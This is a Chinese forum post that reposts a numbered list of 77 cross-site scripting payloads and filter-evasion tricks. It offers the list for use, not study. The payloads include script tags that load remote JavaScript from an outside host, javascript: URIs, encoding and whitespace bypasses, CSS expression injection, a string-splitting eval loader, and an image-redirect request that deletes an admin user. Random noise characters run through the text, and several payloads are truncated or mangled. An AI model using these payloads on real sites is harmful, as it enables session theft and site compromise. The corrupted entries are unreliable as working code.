貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。& W/ K6 Q4 W( F3 k0 L: z
* t! _9 l; N3 ~( }. S7 Q. Z
(1)普通的XSS JavaScript注入
, W& G' `/ |; _& R7 N/ R <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' V7 O6 T8 S: j* v1 k
4 S3 K% m) U% V8 K (2)IMG标签XSS使用JavaScript命令, o) U5 R. r2 L6 c+ ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' H9 @4 S! g2 C7 I
' s) K- e" G* G$ M+ _8 S
(3)IMG标签无分号无引号
/ F, K- U# x/ R9 `+ r: n, G <IMG SRC=javascript:alert(‘XSS’)># N* [+ V2 `$ V$ z. p1 G
& Y2 R- X( X3 H! o7 v+ i+ d2 y
(4)IMG标签大小写不敏感
" ~' |; q, w4 B9 ?1 B' L$ E <IMG SRC=JaVaScRiPt:alert(‘XSS’)>, d5 v0 i) W; F& d% P- _4 s4 G6 h t
" s7 _* f1 L/ j$ {0 _
(5)HTML编码(必须有分号)6 y& N0 S/ K. R1 p, F
<IMG SRC=javascript:alert(“XSS”)>
; Q) l4 a. v' k
( X* m) M" [1 O' i (6)修正缺陷IMG标签" V1 p- O1 r# Q7 P: Q* p
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
/ F+ i+ F& f( I. s. O4 U( l8 e" c! w; M+ L X2 D/ R9 S
(7)formCharCode标签(计算器)
0 g# d9 \& S: d# g <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>' w7 k8 W1 U+ B9 }0 l
8 K, T" z( |: H! K* q* v: r (8)UTF-8的Unicode编码(计算器)) `% B- p* c3 t" y
<IMG SRC=jav..省略..S')>. a; c" H3 o& v
5 E1 P4 W% \9 o (9)7位的UTF-8的Unicode编码是没有分号的(计算器)9 h) U8 W* K6 ~) M+ }" e4 v
<IMG SRC=jav..省略..S')>
8 O4 V' p. t! _( C
8 R4 a ~! l9 @+ a0 t (10)十六进制编码也是没有分号(计算器)! f; p& N6 N! E7 `
<IMG SRC=java..省略..XSS')>" P3 n$ o2 B+ e3 U' a
, ?1 \% L& i6 I: H! T& F
(11)嵌入式标签,将Javascript分开
; `2 x! |: V+ ^. Y. K5 T& Y# U& B <IMG SRC=”jav ascript:alert(‘XSS’);”>
' W `. J9 t$ p% o5 E0 U- T
+ F4 I8 i( k Z8 @. ^8 d8 X (12)嵌入式编码标签,将Javascript分开. |- |! @: Q( c' ?% f! b3 H8 D+ T
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; h+ c( Q2 ?, [6 u& C: j/ Z& Z; Q( t- N
(13)嵌入式换行符
- m) x% D- b) T; Y( |, ^& ^& ^ <IMG SRC=”jav ascript:alert(‘XSS’);”>9 Q' j: \+ V8 H1 v" @1 b( R( A
* _5 I8 O$ a- L. P' M# I
(14)嵌入式回车8 c+ ]$ _+ b* D+ t7 R4 B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 {" {9 l* y* Q6 m$ e8 I: c/ h
/ X- F- w6 D- p, F9 m2 B (15)嵌入式多行注入JavaScript,这是XSS极端的例子2 O' Y7 B. [& _; d% X f: U
<IMG SRC=”javascript:alert(‘XSS‘)”>4 t1 F/ J- R$ a3 d% F: ]
" E# c# E* R6 ?; C6 A8 u/ z* A- E
(16)解决限制字符(要求同页面)
/ l, O" _8 R, v <script>z=’document.’</script>1 V% s+ c/ N: J( |+ k* I
<script>z=z+’write(“‘</script># M- v1 c, z8 `: K+ { `) P
<script>z=z+’<script’</script>% y+ T8 l% ~+ w+ U
<script>z=z+’ src=ht’</script>
^4 Z3 u8 G w* Z <script>z=z+’tp://ww’</script>
7 i! l8 Q; L1 }4 P, X) j <script>z=z+’w.shell’</script>
# u+ L" u3 T7 @" s4 W& T; {5 o/ \ <script>z=z+’.net/1.’</script>7 {; D$ ]: I, |% f2 M7 Y
<script>z=z+’js></sc’</script>
2 m; s1 l( T; N, k) }, K <script>z=z+’ript>”)’</script>
) T' E+ j( o9 S e" T <script>eval_r(z)</script>* Q& C0 P, ?# n* |( K
% j: a, \3 o- ^7 q
(17)空字符7 B* H7 Y, q0 o4 M( j+ w
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
H# r2 s& p \+ I1 i8 X5 D2 c# T9 |8 z. v V" O% g
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用# e9 Y2 H B* a' P4 R+ K
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
7 w+ Y# w" g b7 n
, N; P8 f# R* h! t5 b2 H (19)Spaces和meta前的IMG标签3 E" p0 w, M2 C( ~: O( t, n: ]9 l, w
<IMG SRC=” javascript:alert(‘XSS’);”>
, ^% n7 R8 f1 \# g
6 }% w7 o H1 W; i (20)Non-alpha-non-digit XSS" K: M* q" t3 D/ j+ C7 a" S
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
3 l) k. o; |" ^" i; Q) H! h9 Y
3 Q% q9 E7 ?: I# V: i (21)Non-alpha-non-digit XSS to 2
; Q+ X! h( }# ?& o! i <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) h5 F, `+ D( Y1 c( b; o/ b
$ b" q$ U, Y/ Z8 G( `! G \2 N (22)Non-alpha-non-digit XSS to 33 H$ K1 S+ {- U: T& N8 a- P/ Z
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
( U5 |) a! E3 e# Z1 ^2 `1 z$ J1 K5 {( I, I% r/ }! X7 a& m! D
(23)双开括号
- ~4 c @4 \+ U+ l- D, x3 E/ y1 g <<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ a* ]( K% o, t |7 r( o' z5 G: y l* j
(24)无结束脚本标记(仅火狐等浏览器)5 A V# o2 _' A2 Z5 F! s1 T
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
4 ]* @! W! d. i1 A9 ]: t; q* H j0 S E; p5 C" y
(25)无结束脚本标记2
) s. D9 K5 W# z+ u5 i( b <SCRIPT SRC=//3w.org/XSS/xss.js>( `+ Q7 o0 ]4 c% L
3 o! ]' E( ?2 C (26)半开的HTML/JavaScript XSS, K7 ]- Q; W7 B9 Z2 v+ C9 r
<IMG SRC=”javascript:alert(‘XSS’)”
. P; |3 X5 }7 l# L
5 Q6 g- e& s8 f# P. h2 _ (27)双开角括号3 ~, u$ i- d2 `+ P
<iframe src=http://3w.org/XSS.html <5 `! L Z0 v4 D% X4 C
: i/ M7 u8 M) T* T/ |
(28)无单引号 双引号 分号
0 C& P$ j0 z* d# @1 n. u4 y <SCRIPT>a=/XSS/
5 B/ P" V2 Z+ g' t% |" V alert(a.source)</SCRIPT>! J& w) v2 M6 m
0 J4 ?% u3 u3 T0 @$ L) D
(29)换码过滤的JavaScript
% G; f" |8 }* d" K \”;alert(‘XSS’);//
- {% v3 |: k' V q( Q4 B! D4 b+ T3 I' o9 W9 W1 H# k# P0 Z4 a
(30)结束Title标签; L: y, Z1 u; [- T. [8 i: L* W& a
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% j9 F* k- N |4 \% h
' G; Y% G4 \# Q" n( l
(31)Input Image
4 u# A; T5 j6 f1 w q1 h <INPUT SRC=”javascript:alert(‘XSS’);”>
7 f- Y3 j* | _: F1 \: ] S
; k+ T& V/ W8 n5 k) t (32)BODY Image
! ]) u8 E+ \' J& [8 K. T <BODY BACKGROUND=”javascript:alert(‘XSS’)”>% |; g Y* G8 v; j5 B7 E# e) ?" ~# ~
`' @) j% Y h% ~ m& U
(33)BODY标签2 F! B R. d1 ?8 ]6 ^2 g: y5 O
<BODY(‘XSS’)>
% @$ @: Y& [+ }- ?6 g; z& S0 x: \; o& a
(34)IMG Dynsrc
; I- I: h. X6 f <IMG DYNSRC=”javascript:alert(‘XSS’)”>
6 N/ W# P# Z) q2 [' K
) z, w& c: \# P4 J (35)IMG Lowsrc
, y! F1 [! P. b0 m q- y3 K. X <IMG LOWSRC=”javascript:alert(‘XSS’)”>5 k& t: S* Z0 C W7 ~, X* V% Y8 @
+ |+ N& [+ A1 a5 w6 U (36)BGSOUND
1 h8 h8 q+ T q v <BGSOUND SRC=”javascript:alert(‘XSS’);”>
4 i3 T2 t! j) j
8 l" p- r" z: _8 n (37)STYLE sheet) ~! d+ Q( {. J- l: I
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>5 w2 X6 c5 D0 W! A1 k" j- M9 y
' r. A4 G* m; s9 y
(38)远程样式表
. i9 _# m1 x6 s, |( J' j' p% @ <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 x$ N# F. ~, Z
5 W; b9 K2 n! \
(39)List-style-image(列表式)
0 O: a9 ]' E5 }1 u5 @2 n <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
w. u1 M* M1 m) X% I2 i( h s' b# X6 @) \' R/ e$ L+ g
(40)IMG VBscript
, @, [; Z- i! m t5 h' B <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS5 D7 P! M+ F) h) F% V
9 |4 D$ ^ x6 C m0 q: N# S (41)META链接url
" }' v* Z" m- l" q4 Z1 V% c <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>1 t. T1 n7 m. @! \
5 {/ o2 r8 E1 U2 n( Q: t+ B
(42)Iframe
7 v, e5 p5 J9 Z/ `; M0 U. Q4 W <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
, A! Z1 t( z; Q9 Z+ C
9 x$ d2 x+ E6 G4 H1 y (43)Frame2 `; F: p1 ?* k4 V2 p: L
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>) n ~- y' x! c- Q, H7 }! p
& L! o Q! G& a0 _1 h7 ~6 S3 S (44)Table
0 F' W; r0 C' v: f <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>* g* b0 u0 N, T4 L2 s* X3 c# }
9 [% T" I* Y1 X (45)TD
1 R! T, Z8 y3 F4 L* s <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
0 S% ?0 J6 S8 D/ o% t- f$ b! G5 M( ^* N
(46)DIV background-image2 c8 {5 X% _: ] v M
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' G2 h6 t* v8 v0 J2 E
" a* @ I% W( v+ F. L+ U/ k3 P- F (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)* g+ C- G/ ~# C) `6 @ \, g' b
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ z/ T* ?, e% r, z3 f8 \5 g$ x4 T9 ]5 b! y
(48)DIV expression5 a8 A# a1 K' q2 ^0 e$ U. p; m
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
* _, e$ t# Z# T" m3 Q+ x! x* q. A; [
(49)STYLE属性分拆表达
( X7 l, w8 [. N) S n/ z3 D <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! \% b0 I' L; j* w* }6 n+ \& g+ I: c8 \& v5 f
(50)匿名STYLE(组成:开角号和一个字母开头). j1 M3 F' q% r+ c' I& ?# p- y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
4 F+ S3 h: ?$ _7 k% w# o& D1 _, l/ q
(51)STYLE background-image
! Z# l+ H8 c! W- o. ?2 S3 ] <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
% s1 M3 \9 v, G* j5 {; E) s) Y d
& B, M7 a. z, ?$ T (52)IMG STYLE方式2 F! p+ L6 Z$ G0 K5 P# s! g- b, s4 I
exppression(alert(“XSS”))’>/ P" x: H& P5 g, h! b5 Z- ~
- [, M$ S) [# Q! L
(53)STYLE background2 N' w2 ]$ p; W+ x: P5 ?1 C
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>7 n) ]" s8 }5 ]) F* m1 ~1 q6 L
" U9 n/ @! h! v
(54)BASE
! i. X. b* f! W" [' @# O <BASE HREF=”javascript:alert(‘XSS’);//”>
! d1 s; B. x. \8 m
3 I, Y* T0 {3 Y+ X, K) x4 Z; t (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 z& F$ T6 ~. k% c <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>, D% `* T- ?( U
# ~" r3 y4 C8 R. F
(56)在flash中使用ActionScrpt可以混进你XSS的代码
+ }! f5 [; U* n7 r W1 d) [ a=”get”;$ Q' Z. ~7 c" O; Q& z2 E; \
b=”URL(\”";$ y5 V) o7 [0 P, U! u* g
c=”javascript:”;
3 C0 d r+ g, C+ x/ u; f d=”alert(‘XSS’);\”)”;
: }, t- g2 c8 G9 r& k eval_r(a+b+c+d);% _, T! e3 T1 e
5 X7 |+ C0 t( h8 r, l, @/ v (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
2 I( u* [3 ]' s0 \ S3 j4 w& \ f' c <HTML xmlns:xss>. R# F' k$ e9 h
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
7 u6 t+ A, N0 U# g" w. `0 q* s <xss:xss>XSS</xss:xss>
4 b# P& l5 l* ? </HTML>
, a5 v! e% {% ? f m. Y3 }" I. }) E- \/ R
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用+ a* p) n8 u& V
<SCRIPT SRC=””></SCRIPT>- d& w1 g3 H w* p- M
' i( m- E& V& J
(59)IMG嵌入式命令,可执行任意命令0 E- ?% ]0 k3 T8 }8 M) h0 h
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
# Q$ I4 B) w$ n! X' |5 ^/ L1 `6 Z; G
(60)IMG嵌入式命令(a.jpg在同服务器)' d+ ~( d& Y# w* x
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser# Q6 O8 D7 C- U
) D! n) O7 N, c( C/ v3 Z
(61)绕符号过滤! n! L% _: e$ ~( G, S
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
# Y. c$ w$ b2 f* m0 e; z
) J5 O, L7 |) N/ M6 u4 u (62)
& ^4 ~+ o; y+ F& ? <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>- m6 I% j, G9 X7 @/ ^. b
. ~* A$ f: R4 f
(63)( h3 q% T' {; N# F7 s9 C5 g! X
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 G/ f) v" P5 c# ^
& K: `, P: X3 |
(64)( R0 \ F- ]3 `9 F7 a/ @
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>* z) y+ c4 U5 k3 O4 p
1 @( W# W% ^! u" y" ] (65)
' \7 L, a6 g+ Q0 g <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT># K, O' P8 t$ J; O0 C5 F$ {
& @3 D- v% a) [6 w (66)( Z; w+ d/ p8 Y0 h3 |) _8 J. J
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
* w8 ^1 s" o3 j* f9 z5 o/ w
+ n/ ?" ^0 K- M+ E (67)$ u/ a* ~( n- i6 }/ g2 g' a
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
/ w3 A7 ?6 P' z) R7 w+ ]
5 W3 i4 j' g& f+ b8 J `# r (68)URL绕行" _. Q0 h+ ^5 @' t0 G
<A HREF=”http://127.0.0.1/”>XSS</A>
5 V# D2 N2 j4 N5 \ G' Q
1 P W, ^/ n* z (69)URL编码" A6 B! R3 X- M$ M- I$ \1 C
<A HREF=”http://3w.org”>XSS</A>8 |& P9 q' p; D( ?
) l3 N, S0 W$ z |. }* L (70)IP十进制# P) R2 p# a! L ^3 z
<A HREF=”http://3232235521″>XSS</A> B h2 w8 H8 d, u0 X- ]
( ^: ~# L- f* i# P (71)IP十六进制4 \* b1 B$ J7 [, V6 y/ y+ l: a
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>. G, x* V; n7 P R: t( c* F
2 ]. P- s/ R# y+ A1 }
(72)IP八进制
2 Z+ |6 V, u# `" w. n <A HREF=”http://0300.0250.0000.0001″>XSS</A>
8 ]& F, m( Z4 m: \8 A$ A
8 K6 L; C7 O+ b% Q: |" ] (73)混合编码
9 e6 Y& p6 [4 _9 V1 X <A HREF=”h/ C J( {3 R& o& {; e# p2 i
tt p://6 6.000146.0×7.147/”">XSS</A>
. Y* e: G& x- P* H8 R7 k* u2 f/ v3 z* f0 i1 c
(74)节省[http:]
" U' L$ T; L e: n Y Y/ N# ~ <A HREF=”//www.google.com/”>XSS</A>9 s# C# K$ K( f1 W
- u [* |/ i7 K. u0 c
(75)节省[www]
: p C3 b, }/ g! \$ v <A HREF=”http://google.com/”>XSS</A>
% i, a2 \' f+ ?. q
; R7 W. _6 Y( N (76)绝对点绝对DNS
% e! L7 G6 M1 o. E! V6 b <A HREF=”http://www.google.com./”>XSS</A>" W. p0 F% O/ h, b9 I7 w& B
, g; I. I& E# X( N7 }( d. _2 M" h (77)javascript链接" S d* A& b% B# g
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |